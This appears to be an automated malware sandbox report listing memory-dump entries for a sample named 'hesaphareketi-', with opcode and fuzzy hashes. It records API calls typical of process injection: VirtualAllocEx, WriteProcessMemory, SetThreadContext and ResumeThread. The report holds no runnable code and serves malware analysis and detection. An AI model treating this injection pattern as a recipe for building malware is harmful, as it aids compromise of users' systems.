                                            • Instruction Fuzzy Hash: EB2127B1D003199FDB10DFAAD841BEEBBF5FF48320F50842AE518A7640CB399941CBA5
                                            APIs
                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0757BA08
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: a78e25253b89be549173130af883c4c1f3c4210d08543c8376df132c3ec0d132
                                            • Instruction ID: c8ecf45f3c6ada45f1a88667ebe20ff74f04b10cf4c51d2792f667c1d4c02bf0
                                            • Opcode Fuzzy Hash: a78e25253b89be549173130af883c4c1f3c4210d08543c8376df132c3ec0d132
                                            • Instruction Fuzzy Hash: 522127B1D003599FDB10DFAAD881BDEBBF5FF48310F50842AE919A7240D7799941CBA4
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0757B426
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: dd726e5d9f09fde824ba89e7253153ee164b159528da5477dad20c378974f8db
                                            • Instruction ID: d3f5d5c1e319db29dd6b826fd83303757d5fb104e0047bfdddf14246a3d6c8fc
                                            • Opcode Fuzzy Hash: dd726e5d9f09fde824ba89e7253153ee164b159528da5477dad20c378974f8db
                                            • Instruction Fuzzy Hash: 492159B1D003098FDB10DFAAD4857EEBBF5FF48220F54842AD459A7241CB789945CFA5
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00DFFBAE,?,?,?,?,?), ref: 00DFFC6F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: bcb384fbbd5e304e1c483e7854468fa58975ec460e4122602bda27427a77e060
                                            • Instruction ID: 0f4c112b07ea67e9dfd035e8330cb0b10f4622ad5b9688b7250edb75d460ef10
                                            • Opcode Fuzzy Hash: bcb384fbbd5e304e1c483e7854468fa58975ec460e4122602bda27427a77e060
                                            • Instruction Fuzzy Hash: 792103B5D0020C9FDB10CF9AD884AEEBBF4EB48320F14842AE914A3310D378A940CFA1
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0757B426
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: de68d2757b06a0f9c8cea2ab0c42a62a8e3905f65904b88b71854c6378b16b87
                                            • Instruction ID: f7f6273a2cdb958c7a6cae0dd5427e723883b0b454908c172487919c0da27d65
                                            • Opcode Fuzzy Hash: de68d2757b06a0f9c8cea2ab0c42a62a8e3905f65904b88b71854c6378b16b87
                                            • Instruction Fuzzy Hash: FD2107B1D003098FDB10DFAAD485BEEBBF5AF48210F54842AD559A7241CB789945CFA4
                                            APIs
                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0757BAE8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 050629ffe6fbf7f7fe5964aa5f2ef660c7f33f97eff9c8a2fdb1777d1dab242a
                                            • Instruction ID: 76b0a01f1572314d2be6d560ee833500061b824a390b495a512ac8e29dff785a
                                            • Opcode Fuzzy Hash: 050629ffe6fbf7f7fe5964aa5f2ef660c7f33f97eff9c8a2fdb1777d1dab242a
                                            • Instruction Fuzzy Hash: D221F8B1C003599FDB10DFAAD841BDEBBF5FF48310F50842AE919A7240CB799941CBA4
                                            APIs
                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0757B926
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 3b7b61713581443be4a135ae9859a73b4ec7208e6b59ce0ee9e2e00e8edb3c63
                                            • Instruction ID: cae1e01bd027982aa62c50d56018e830493d7062e1eb69075261c87312ab6e29
                                            • Opcode Fuzzy Hash: 3b7b61713581443be4a135ae9859a73b4ec7208e6b59ce0ee9e2e00e8edb3c63
                                            • Instruction Fuzzy Hash: 98114A75C003499FDB20DFAAD845BEEBFF5EF48320F14881AE515A7650C7359941CBA1
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00DFD9F9,00000800,00000000,00000000), ref: 00DFDBEA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 387cf1b8c03fc9044c8480ce4d06f108616b56feaa88b1aef24fdfae41d5a0a8
                                            • Instruction ID: c952eaf5bdccf38f6a5284f78d02c43b134c660a42f88be01335fce4ca41c567
                                            • Opcode Fuzzy Hash: 387cf1b8c03fc9044c8480ce4d06f108616b56feaa88b1aef24fdfae41d5a0a8
                                            • Instruction Fuzzy Hash: 321114B6C003099FDB20DF9AD444BAEFBF6EB48310F16842AE519A7300C775A945CFA5
                                            APIs
                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,F0075C6F), ref: 0757AF22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 12b163574077a800d5e320326dcb9615ec273fe0550ddbf855bc1c4be5b8c371
                                            • Instruction ID: a84471b3224639b8bbca101b825bda6f8c5262ccfa5280df071471c5227c9280
                                            • Opcode Fuzzy Hash: 12b163574077a800d5e320326dcb9615ec273fe0550ddbf855bc1c4be5b8c371
                                            • Instruction Fuzzy Hash: 80115BB5D003498FDB20DFAAD4457EEFBF5EB48220F14841AD515A7640CB796941CB94
                                            APIs
                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0757B926
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: a3fbe06f6a079e19ec9fbe86c3d2fc58d14cd9bb1305e5098e1e4497ae025156
                                            • Instruction ID: b82cba6345795fd8396f43ff5af34044a42709ebda9ab7f865af101af81394b7
                                            • Opcode Fuzzy Hash: a3fbe06f6a079e19ec9fbe86c3d2fc58d14cd9bb1305e5098e1e4497ae025156
                                            • Instruction Fuzzy Hash: 141126B5C003499FDB20DFAAD845BDEBBF5EF48320F54881AE525A7250CB75A941CFA0
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00DFD9F9,00000800,00000000,00000000), ref: 00DFDBEA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 67930bcf365ef50e5e9bd15a7c08851b02373a03af675904d1a84a6e29530452
                                            • Instruction ID: ab85c72749db17ff537ba15ac0db24cbc2ba55569a87decac583e7ebc43becb1
                                            • Opcode Fuzzy Hash: 67930bcf365ef50e5e9bd15a7c08851b02373a03af675904d1a84a6e29530452
                                            • Instruction Fuzzy Hash: 6A1164B6D003088FDB10CFAAD444BDEFBF6AB48310F16842ED519A7200C779A945CFA0
                                            APIs
                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,F0075C6F), ref: 0757AF22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 34171b254ba23db626e079cee86371d9c8f35ecd2a050b892683579e062ec9a5
                                            • Instruction ID: 75a829a3919b160785dbb7751e34c9cce17484e539f95d0a0ab526595378814d
                                            • Opcode Fuzzy Hash: 34171b254ba23db626e079cee86371d9c8f35ecd2a050b892683579e062ec9a5
                                            • Instruction Fuzzy Hash: 371128B5D003498FDB20DFAAD4457DEFBF5AB48220F14881AD519A7240CB79A941CB94
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0757F2DD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0757F2DD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00DFD97E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hq
                                            • API String ID: 0-1594803414
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hq
                                            • API String ID: 0-1594803414
                                            Strings
                                            • C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll, xrefs: 0577CBFD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll
                                            • API String ID: 0-2445627988
                                            Strings
                                            • C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll, xrefs: 0577CE7A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll
                                            • API String ID: 0-2445627988
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8q
                                            • API String ID: 0-4083045702
                                            • Opcode Fuzzy Hash: e321a0ecd5121a075b5e6ddd6b580ec1a5025e7a397958f1f76a2b1dca9220b4
                                            • Instruction Fuzzy Hash: 5A210A76F083894FDF029B7899605FE7F72DF96240B584493C450DB293E6248D0AD7A2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 646dfa265b3b0353c313b6c965297467fb2949a57a47b36b747b97b80d290c45
                                            • Instruction ID: 42719ad10cb28f75b65bd5c32a568b84eaecbf25e355a0bf46872442f63e68a3
                                            • Opcode Fuzzy Hash: 646dfa265b3b0353c313b6c965297467fb2949a57a47b36b747b97b80d290c45
                                            • Instruction Fuzzy Hash: E3213A706483588FE7199F64F41A76A7FA1EF46704F00889AD5418B393DBF58C09AB51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2683cefb4d1cb683d4750053940794a45c9d357a59fc9fac9337a95198b232ab
                                            • Instruction ID: 52f9574abe4799fee046c688ebe1f629ee1f3a6c7b499248c5f107a5f0533e94
                                            • Opcode Fuzzy Hash: 2683cefb4d1cb683d4750053940794a45c9d357a59fc9fac9337a95198b232ab
                                            • Instruction Fuzzy Hash: 0831EC70A0474A8FCF00DF64E8845BF7BB2FF46300B14886AE806EB266E634DD05C761
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1236941468.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_98d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 48b154c9b70f81a0e66656ad187aa420e98ac84c3245a87cb3dedd96285e1aa1
                                            • Instruction ID: 0d979f1241e53c3c5305bba535189792b592fad2b9f1a01110677925a2fc2e94
                                            • Opcode Fuzzy Hash: 48b154c9b70f81a0e66656ad187aa420e98ac84c3245a87cb3dedd96285e1aa1
                                            • Instruction Fuzzy Hash: 4821F472509240EFDB19EF10D9C4B16BBA6FF88314F248669E9490A395C33AD856CB61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9a6f29b51bfbbe9cee2a4f224d959582a0430ab6f257d9c0bea856f50ef8780
                                            • Instruction ID: eab54ad13dde351b76d9b546294353dbb8c0ce1fd7cf25a61a38961f5853bec2
                                            • Opcode Fuzzy Hash: f9a6f29b51bfbbe9cee2a4f224d959582a0430ab6f257d9c0bea856f50ef8780
                                            • Instruction Fuzzy Hash: DA21C871610B099FDF34CE38E446A26B7F6FB45214F080E2AE0AACB641D770E8559B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5172881553469ad432df0eb661e59a4447581136cc4f455a523ab93db76e97ab
                                            • Instruction ID: ec102bf7c1e1161aa436b13bb8f27cff9b3e2d00a04fa6f63548b5df566915d6
                                            • Opcode Fuzzy Hash: 5172881553469ad432df0eb661e59a4447581136cc4f455a523ab93db76e97ab
                                            • Instruction Fuzzy Hash: 3821F536A00A189BDB01AF64E888B7FB6A7FB84712F448425E945D7294DB34CC52E7D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e642344acdc07a4422df67fa75cdf19060ee0539ecfa93e5f384cbf692f4899
                                            • Instruction ID: 7bde59ae95dd4002c5b84ff5c854e67e43ffb4a898d3f2594bfe5654e785a88e
                                            • Opcode Fuzzy Hash: 7e642344acdc07a4422df67fa75cdf19060ee0539ecfa93e5f384cbf692f4899
                                            • Instruction Fuzzy Hash: 5A2159716002189FDB20DF1AE484FAABBB6FF88610F05405EE9468B722D730E841DB64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237413044.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_99d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84aac78976a506de7a0bd97f206b3514f8c2aa645c865bac2695ac45e5080d40
                                            • Instruction ID: 078316df743b8761f48b0a5a37f66674ee42c4a2106dfbc66bb6884abbabd783
                                            • Opcode Fuzzy Hash: 84aac78976a506de7a0bd97f206b3514f8c2aa645c865bac2695ac45e5080d40
                                            • Instruction Fuzzy Hash: FC213471604300DFDF04DF18D9C4B26BBA5FB88329F24C96DE8094F292C33AD846CA62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237413044.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_99d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a9e969473231b8e4e1e805dc47bbd899c1914991067f5070f28d8936cb9152f
                                            • Instruction ID: aea5988303118a35af41597493e1472649e96887ead22215dac89aa4a6a9a42b
                                            • Opcode Fuzzy Hash: 0a9e969473231b8e4e1e805dc47bbd899c1914991067f5070f28d8936cb9152f
                                            • Instruction Fuzzy Hash: 4D210475609300DFDF14DF18D9C0B2ABB65FB84324F20C9ADE8494B296C33AD846CB61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61dde52dbbacddc3a3b0300ce95b900fbe806976348864e5c906102cea10af7c
                                            • Instruction ID: 3fc926cd74c1116a6c0a852e0aca5694af076f44687d0c6039b800e752735804
                                            • Opcode Fuzzy Hash: 61dde52dbbacddc3a3b0300ce95b900fbe806976348864e5c906102cea10af7c
                                            • Instruction Fuzzy Hash: 02213B757002189FDB249E1AE584E7EB7A6FF88720B11842EEA068B751DB71E841DB60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d28c67c06e05db5d7a8be9d0ed816dedec71ecf5cd7ec81384516e3691e5e69
                                            • Instruction ID: b449767b28a32dea3bbe88d233538da79fa781c6476a4f53b34f7d5e6d8d4924
                                            • Opcode Fuzzy Hash: 6d28c67c06e05db5d7a8be9d0ed816dedec71ecf5cd7ec81384516e3691e5e69
                                            • Instruction Fuzzy Hash: 3011E634B043085FDF25D626E868B7677A6FBC5710F54C46AE405CB292CB70D80A9752
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a8398dd92a28ebf9a1222d42386936aac3bbac4409d9b6316f4cd8280fdb5e6
                                            • Instruction ID: 47a35f0f1109ba6b763a8cf6ba1535bedb178734b224a71a1b17a8aede41248d
                                            • Opcode Fuzzy Hash: 5a8398dd92a28ebf9a1222d42386936aac3bbac4409d9b6316f4cd8280fdb5e6
                                            • Instruction Fuzzy Hash: A621BE71A0061A8BCF00DF65E8805BFBBB6FF45301B148466EC09EB265E230DD15CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e80ea5526c6c796927271b96f3e03c6a3fdba3c46e5b67639c3763ed18115b1
                                            • Instruction ID: 9ea3c9277b7a160a6553702ff837f407e8646b2ae4333e861ecaf89ab09bef12
                                            • Opcode Fuzzy Hash: 9e80ea5526c6c796927271b96f3e03c6a3fdba3c46e5b67639c3763ed18115b1
                                            • Instruction Fuzzy Hash: 522158357006089FDB20CE16D484FAEB7B6BF88714F05802DEA4687751C731E841DF20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 173a8068ce8ab4a194c25f30cf42057ac1e506b06b35e6e4a8d0b0ae36e95a38
                                            • Instruction ID: 8c71a7879e98f64118a92211f657edde449d93c95e178f375340016e79795f4e
                                            • Opcode Fuzzy Hash: 173a8068ce8ab4a194c25f30cf42057ac1e506b06b35e6e4a8d0b0ae36e95a38
                                            • Instruction Fuzzy Hash: 3F21CC71E0020A9FCB04DFA9C9449AFFBF9FF98310B11C55AE519A7211E770A956CB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dfe45f49c09d9f28f916f8d5d41276512d2d4949115b9c75848bc7f56a1580ac
                                            • Instruction ID: 062a226bcdb372ef6a4f50b82cff8617736d43470d175edbbee830c66c3eee52
                                            • Opcode Fuzzy Hash: dfe45f49c09d9f28f916f8d5d41276512d2d4949115b9c75848bc7f56a1580ac
                                            • Instruction Fuzzy Hash: 5D21EA71E1020A9F8B04DFADC8849AFFBF9FF98310B10C51AE518E7211E770A956CB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 048e14cb4665ff3dadffd2bfc690d5e3b283734f088ecdbb4199c990d3a3281b
                                            • Instruction ID: 887d3599d274da9d24305e4efb1bad7a29c5ecbef3d933ae65829fe5d1aa6de0
                                            • Opcode Fuzzy Hash: 048e14cb4665ff3dadffd2bfc690d5e3b283734f088ecdbb4199c990d3a3281b
                                            • Instruction Fuzzy Hash: 5E11A5347043085BDF25DA26E859B6A7397FBC4710F14C93AE8059B385CB70E8069792
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59b6309cddb0a5522ef65e1bf2a056ed6164d817ec13e6ce14624df1fece28fe
                                            • Instruction ID: 3af9a80d9f20bce098e60f1513803dc7475d3b4f976153406b807ed4f4c7daae
                                            • Opcode Fuzzy Hash: 59b6309cddb0a5522ef65e1bf2a056ed6164d817ec13e6ce14624df1fece28fe
                                            • Instruction Fuzzy Hash: DA112C31719350AFDB121734A869BA53FB1AF87112F0500E6F881CB2A1EA355846D7A1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1236941468.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_98d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
                                            • Instruction ID: a943977fdd23ea19be358db1387d4c07935fb1a67259bc4606aab1ccdad0df9b
                                            • Opcode Fuzzy Hash: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
                                            • Instruction Fuzzy Hash: AF219076504280DFCF1ADF10D9C4B16BF72FF88314F2486A9D9490B256C33AD856CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa64693c1eb988bd4b0737f91b7ce61dfb13b8465c3111887bd4f27b31dfc7c7
                                            • Instruction ID: e5439d78d16055bffb7e54ee278cfaac42fc2ebc60821960a5ed277941101461
                                            • Opcode Fuzzy Hash: fa64693c1eb988bd4b0737f91b7ce61dfb13b8465c3111887bd4f27b31dfc7c7
                                            • Instruction Fuzzy Hash: 221104723041049FCB06AB68E844DBDBB7AEF8A610715009AF605CB223DBB29C03DB71
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca3c80bd4657b172979a69e8d5062075771ac6d39063a3d3fa28a68c8d246274
